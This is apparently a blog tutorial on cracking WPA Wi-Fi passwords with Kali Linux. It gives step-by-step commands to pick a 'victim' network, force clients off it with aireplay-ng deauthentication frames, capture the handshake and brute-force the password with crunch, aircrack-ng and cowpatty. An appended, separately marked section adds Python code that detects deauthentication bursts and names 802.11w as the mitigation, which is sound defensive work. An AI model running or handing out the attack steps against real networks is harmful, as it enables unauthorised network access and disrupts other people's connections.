WPA Hacking with Kali

Today's topic is for the hackermans among us, and those becoming hackermans. This tutorial is about WLAN hacking and brute-forcing!

This tutorial is for educational purposes only and should only be used on your own network.

Things you need

A laptop/PC or USB stick with Kali Linux installed on it. A wireless adapter that supports monitor mode, like this or this. There are more of them, but for this tutorial I will stick with those two.

I assume you have Kali installed on your computer or on a USB stick. For USB, you can easily do it with LiLI. Just download the distribution here (choose the right architecture!); the configuration is straightforward. But be careful not to accidentally delete your system partition.


After logging in, open a terminal and type:

For Alfa Network AWUS036NHA:

apt-get update && apt-get install firmware-atheros

For Alfa AWUS036ACH:

apt-get update && apt-get install realtek-rtl88xxau-dkms

So now the firmware for the WiFi dongle is installed and is ready to use.

Next, let's install the tools we will be using. Depending on your Kali image (full or minimal), they may already be installed. To install the tools, type:

apt-get install aircrack-ng cowpatty crunch


aircrack-ng and cowpatty are for Wi-Fi brute-forcing, crunch is for password generation.


Let’s start with the Basics

First, enable monitor mode on your dongle. Plug it in, wait until the LED blinks and enter the following command:

airmon-ng start wlan0

This creates an interface named wlan0mon.

The dongle may not be wlan0; run ip addr to locate it.


Now let’s search for a victim. To scan for victims run airodump-ng wlan0mon.

Let's assume we have a network with the following information: ESSID: bigbear; BSSID: 00:14:6C:7A:41:81; CH: 9
The interesting things here are the CH, BSSID, ESSID.

Now that you have a victim, take note of the entries and run airodump-ng wlan0mon -c {CH} --bssid {BSSID} -w {outputFileName}

So for bigbear it would be:

airodump-ng wlan0mon -c 9 --bssid 00:14:6C:7A:41:81 -w wpastream

Now the output will be saved in wpastream.cap in your current directory.


Next we need to deauthenticate some users to get the handshake. Open a new terminal and type aireplay-ng wlan0mon --deauth 3 -a {BSSID}

-3 means deauth all.

For bigbear it would be:

aireplay-ng wlan0mon --deauth 3 -a 00:14:6C:7A:41:81


Then watch the upper right corner of the first terminal for [WPA handshake].

It will remain empty until you finally catch a handshake. Once you have caught one, press Ctrl + C to stop capturing.


Once you have caught a handshake, run wpaclean /path/to/handshakeFile to clean the handshake file.

In our case I would run: wpaclean wpastream.cap

So we are now ready to crack the password. Depending on the password complexity, it may take from minutes to hours to crack one.

There are two ways of cracking it: the first is with a wordlist, the second is hash cracking. In this tutorial I will use brute force.

We will use a crunch generated list, just run:

crunch 8 8 | aircrack-ng -e [ESSID] -w - [file path to the .cap file]

The first 8 is the minimum password length and the second is the maximum.

For bigbear it will be:

crunch 8 8 | aircrack-ng -e bigbear -w - wpastream.cap

The same goes for cowpatty:

crunch 8 8 | cowpatty -f - -r wpastream.cap -s bigbear
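
Seen from the defending side, the deauthentication step above leaves a clear trace on the air: a burst of deauthentication frames for one BSSID. The following is an added example, not part of the original tutorial, that counts such frames in a radiotap pcap taken by a monitoring sensor; the threshold, window, function names and the sample capture are constructed assumptions.

```python
import struct
from collections import defaultdict

LINKTYPE_RADIOTAP = 127  # pcap link type: radiotap header + 802.11 frame

def iter_frames(pcap):
    """Yield (timestamp, 802.11 frame) from a little-endian radiotap pcap."""
    magic, *_, linktype = struct.unpack_from("<IHHiIII", pcap, 0)
    if magic != 0xA1B2C3D4 or linktype != LINKTYPE_RADIOTAP:
        raise ValueError("expected little-endian pcap with radiotap link type")
    off = 24
    while off + 16 <= len(pcap):
        sec, usec, incl_len, _ = struct.unpack_from("<IIII", pcap, off)
        pkt = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(pkt) >= 8:
            rt_len = struct.unpack_from("<H", pkt, 2)[0]  # radiotap length
            yield sec + usec / 1e6, pkt[rt_len:]

def deauth_bursts(pcap, threshold=5, window=1.0):
    """Map BSSID -> peak deauth/disassoc count per `window` s, if >= `threshold`."""
    times = defaultdict(list)
    for ts, frame in iter_frames(pcap):
        # Frame control byte 0: 0xA0 = disassociation, 0xC0 = deauthentication
        if len(frame) >= 24 and frame[0] in (0xA0, 0xC0):
            times[frame[16:22].hex(":")].append(ts)  # addr3 = BSSID
    alerts = {}
    for bssid, seen in times.items():
        seen.sort()
        peak = lo = 0
        for hi, t in enumerate(seen):  # sliding window over sorted timestamps
            while t - seen[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

def sample_pcap():
    """Constructed capture: 1 beacon + 6 deauths for one AP, 1 deauth for another."""
    def rec(sec, usec, fc0, bssid):
        frame = bytes([fc0, 0, 0, 0]) + b"\xff" * 6 + bssid * 2 + b"\x00\x00\x07\x00"
        pkt = struct.pack("<BBHI", 0, 0, 8, 0) + frame  # minimal radiotap header
        return struct.pack("<IIII", sec, usec, len(pkt), len(pkt)) + pkt
    ap, other = bytes.fromhex("02aabbccdd01"), bytes.fromhex("02aabbccdd02")
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_RADIOTAP)
    out += rec(100, 0, 0x80, ap)  # beacon, must be ignored
    out += b"".join(rec(100, i * 100_000, 0xC0, ap) for i in range(1, 7))
    return out + rec(105, 0, 0xC0, other)
```

Pass the bytes of a real capture to deauth_bursts() and tune the threshold to your environment. Networks that enforce Protected Management Frames (802.11w) have clients discard forged deauthentication frames, which is the mitigation for this step.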